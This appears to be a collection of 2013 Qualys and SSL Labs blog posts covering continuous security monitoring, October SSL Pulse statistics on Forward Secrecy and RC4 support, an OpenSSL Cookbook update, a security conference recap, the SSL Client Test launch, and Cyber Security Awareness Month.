Given that you can't prevent all attacks, you need to ensure you detect attacks as quickly as possible. The concept of continuous monitoring has been gaining momentum, driven by both compliance mandates (notably PCI-DSS) and the US Federal Government's guidance on Continuous Diagnostics and Mitigation, as a means to move beyond periodic assessment. This makes sense given the speed at which attacks can proliferate within your environment. In this paper, Securosis will help you assemble a toolkit (including both technology and process) to implement our definition of Continuous Security Monitoring (CSM) to monitor your information assets to meet a variety of needs in your organization.

 

We discuss what CSM is, how to do it, and the most applicable use cases we have seen in the real world. We end with a step-by-step list of things to do for each use case to make sure your heads don't explode trying to move forward with a monitoring initiative.

 

We don’t expect you to rebalance security spending between protection and detection overnight, but by systematically moving forward with security monitoring and implementing additional use cases over time, you can balance the scales and give yourself a fighting chance to figure out you have been owned – before it’s too late.

 

Download the paper and join us for a live webcast on November 12 at 10am PT. Bring your questions, as we'll be taking Q&A.

 

Originally posted on the Securosis site.


In October we made several changes to how we produce our monthly SSL Pulse reports. They include the start of tracking for Forward Secrecy and RC4, and the removal of the requirement to mitigate BEAST server side.

Forward Secrecy

Given the increased importance of Forward Secrecy (FS) in SSL/TLS server configuration, SSL Pulse now tracks support for it among the servers in our data sample.

 

 

Just before the October SSL Pulse scan began, we made some tweaks to the way we test, moving away from a simple binary test (Yes or No for Forward Secrecy support) to something more granular and more useful. Now, there are several possible outcomes:

 

  • Not supported - there are no FS suites in the server configuration.
  • Some FS Suites enabled - the server negotiates FS with some browsers.
  • Used with modern browsers - all modern browsers negotiate a FS suite. This will typically happen with a server that has support for ECDHE suites.
  • Used with most browsers - most browsers negotiate a FS suite. This will typically happen with a server that supports ECDHE suites, but falls back to DHE for clients that do not support Elliptic Curve cryptography.

 

You can see the October results in the following screen capture:

 

[Chart: SSL Pulse, Forward Secrecy support, October 2013]


The results show that a large chunk of the servers (54%) does not use Forward Secrecy with any of the desktop browsers. However, a pretty large chunk (41.8%) does use it with some of the browsers. Only a small number support Forward Secrecy with modern browsers (3.6%), and an even smaller number (0.6%) support robust Forward Secrecy across most browsers.

RC4

We took this opportunity to also start tracking support for RC4 suites. As you may remember, earlier this year we learned that RC4 is much weaker than previously thought. In SSL Labs we now categorise RC4 support as follows:

 

  • Not supported - no RC4 suites supported.
  • Some RC4 suites enabled - server configuration contains RC4 suites, but they might not be actually used. For example, some servers will keep them around to use as a last resort.
  • Used with modern browsers - RC4 is used with at least one modern browser. This shows the servers where RC4 is not used as backup.

 

And the results are as follows:

[Chart: SSL Pulse, RC4 support, October 2013]


As you can see, the green area is very small; only 7.2% of servers do not support RC4. This is not very surprising, as RC4 is one of the most popular ciphers in SSL. Most servers (56.3%) have at least one RC4 suite enabled, but those suites are not always used. More than a third of servers (36.5%), however, actually use RC4 with at least one modern browser. This is the number we need to bring down.

BEAST

This month we stopped requiring server-side mitigation for the BEAST vulnerability. Even though BEAST can still be a problem for some, the impending threat of RC4 means that we must give up on BEAST so that we can start phasing RC4 out.

 

Given that we are not yet penalizing servers that support RC4, the change in our rating means that there is a much higher number of servers that we consider secure:

[Chart: SSL Pulse, servers considered secure, October 2013]

But, with more than 50% of the servers supporting RC4, the number of secure sites will most definitely fall again in the following months.


OpenSSL Cookbook is a free ebook based around one chapter of my in-progress book Bulletproof SSL/TLS and PKI. The appendix contains the SSL/TLS Deployment Best Practices document (re-published with permission from Qualys). In total, there's about 50 pages of text that covers the OpenSSL essentials, starting with installation, then key and certificate management, and finally cipher suite configuration.

 

 

The first version of OpenSSL Cookbook was published in May, but now, five months after that release, I've released version 1.1. The changes in this version are as follows:

 

  • Updated SSL/TLS Deployment Best Practices to v1.3. This version brings several significant changes: 1) RC4 is deprecated, 2) the BEAST attack is considered mitigated server-side, 3) Forward Secrecy has been promoted to its own category. There are many other smaller improvements throughout.
  • Reworked the cipher suite configuration example to add Forward Secrecy as a requirement, making the example more useful in practice.
  • Increased coverage of different key types with a discussion of ECDSA keys. Explained when each type is appropriate.
  • Added new text to explain how to generate DSA and ECDSA keys (a flavour of which is sketched below).
  • Explained the challenge password, when generating Certificate Signing Requests.
  • Marked cipher suite configuration keywords that were introduced only in the OpenSSL 1.x branch. This makes it easier to use the text for reference purposes, if you're still running the older, OpenSSL 0.9.x, version.
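
To give a flavour of the new key-generation material, creating an ECDSA key with OpenSSL is a one-liner; the curve and file names here are just examples, not the book's exact text:

$ openssl ecparam -genkey -name prime256v1 -noout -out example-ecdsa.key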

 

You can get your copy from here.


It was a great time all around at the 2013 Qualys Security Conference. There were plenty of bright, energetic security professionals who are deeply engaged in their work to best protect their organizations against advanced threats. The opportunity to take part in so many quality conversations with such security professionals is something that just isn’t possible at the mega cons.

 

At the show, attendees enjoyed a preview of features that are upcoming in the QualysGuard Cloud Platform, as well as insight on QualysGuard’s continuous monitoring capabilities.

 

As Elinor Mills covered in her post, Qualys CEO Courtot in QSC Keynote Says Security Should Be Felt, But Not Seen, details on product enhancements were covered, including the increased focus on web application security and expanding the notion of continuous monitoring of the network perimeter.

 

The challenges associated with continuous monitoring - vetting systems for weaknesses and policy posture frequently enough to mitigate attack risk - were a significant focus of the conference. One of the highlights was the keynote by John Streufert, Director of Federal Network Resilience (FNR) at the U.S. Department of Homeland Security, in which he comprehensively detailed DHS's efforts to boost the security, resilience, and reliability of the nation's IT and communications infrastructure. That included the continuous monitoring as a service contracts the FNR has put into place for Federal, state, and local governments.

 

Their continuous monitoring efforts also include security dashboards designed to inform and prioritize cyber risk assessments across the government.

 

Mills provided a great overview of Streufert’s talk in her post, DHS Director Streufert: Continuous Monitoring Stops Attacks, Saves Money.

 

Of course, one doesn't need to be the size of DHS to benefit from the implementation of continuous monitoring. Securosis analyst and president Mike Rothman helped put continuous monitoring in perspective for other organizations, both large and small. In his keynote, he served up pragmatic advice on what continuous monitoring entails and strategies for putting it into practice.

 

I provided more details on Rothman’s talk in my post: Focus Continuous Monitoring Efforts Where Breach Will Cause “Blood to Flow in the Streets,” Analyst Says.

 

Securosis also just published their paper on continuous monitoring.

 

In the final keynote of the show, journalist and author Steven Levy reminded everyone what it is we truly owe to hacker culture. In short: just about everything we do today digitally. His talk hailed back to the hacking culture of MIT in the late 50s and early 60s and up through modern times, including the Internet, and how hacking culture remains a crucial part of the fabric of such companies as Google and Facebook. You can find coverage of his keynote in the post Author Steven Levy: What We Owe to the Hackers.

 

For security professionals based in Europe, be sure to attend Qualys Security Conference 2013 in Paris (14 November), Munich (19 November) and London (22 November).


I am delighted to introduce the most recent addition to the SSL Labs web site, the SSL Client Test. For some reason, even though we released sslhaf, our passive client fingerprinting tool, back in 2009, our attention until now remained on server testing only.

 

Then, this year, there was a noticeable increase in interest in computer security, and browser capabilities specifically, which led many of our users to ask us to implement a client test. We already had a page that displayed the capabilities of well known browsers (linked from the Handshake Simulator section); from there, it was really easy to show what your browser can do.

 

Behind the scenes we rely on sslhaf to extract the entire raw client handshake request and make it available to our application (implemented in Java). From there, we simply disassemble the available information and present it to the user.

 

With the client test, you are now able to see the SSL/TLS capabilities of your preferred browser simply by visiting the test page. And, because the SSL protocol is designed in such a way that clients always tell servers about their capabilities, the best part is that testing does not take much time. In fact, it's pretty much instantaneous.

This month is National Cyber Security Awareness Month (NCSAM), marking the tenth year that the U.S. Department of Homeland Security and the National Cyber Security Alliance have brought people and organizations together to discuss ways to stay safe online.

 

More than ever, people around the world are using the Internet for social and business transactions. And we have more devices and “things” - from cars to home security and heating - connected through the Internet today. While it is exciting to see innovative Internet and Web applications that are enriching our lives, unfortunately security is not always top priority with product development, and being connected through the Internet provides the opportunity for some malicious individuals to wreak havoc.

 

That is why October as NCSAM provides an excellent forum for individuals, businesses and government entities to come together to address cyber security. The NCSAM theme of “Our Shared Responsibility” is a powerful message about how education and individual actions can have a collective impact on Internet security.

 

I invite you to take part in NCSAM with me and Qualys as everyone can make a difference. Here are the ways that I plan to take part:

  • Qualys has signed up as a Champion in support of NCSAM. There is no fee for any company to sign up as a Champion; it is simply a great way to build awareness and show your support for NCSAM.
  • Spread the word to STOP. THINK. CONNECT. This simple NCSAM message is powerful to share with everyone - family members, coworkers and children. Help spread the word through company IT education, social media, volunteering at local schools, and by helping family members.
  • As the holidays come, I plan on helping my family members and friends keep their computers patched and updated with the latest software. I also plan on talking to them about using their common sense as they go online. For example, it is important to think carefully about the information that you choose to share online, and with whom you choose to share it.
  • Sharing tips. Throughout this month, my colleagues and I will be sharing tips and best practices for staying secure online.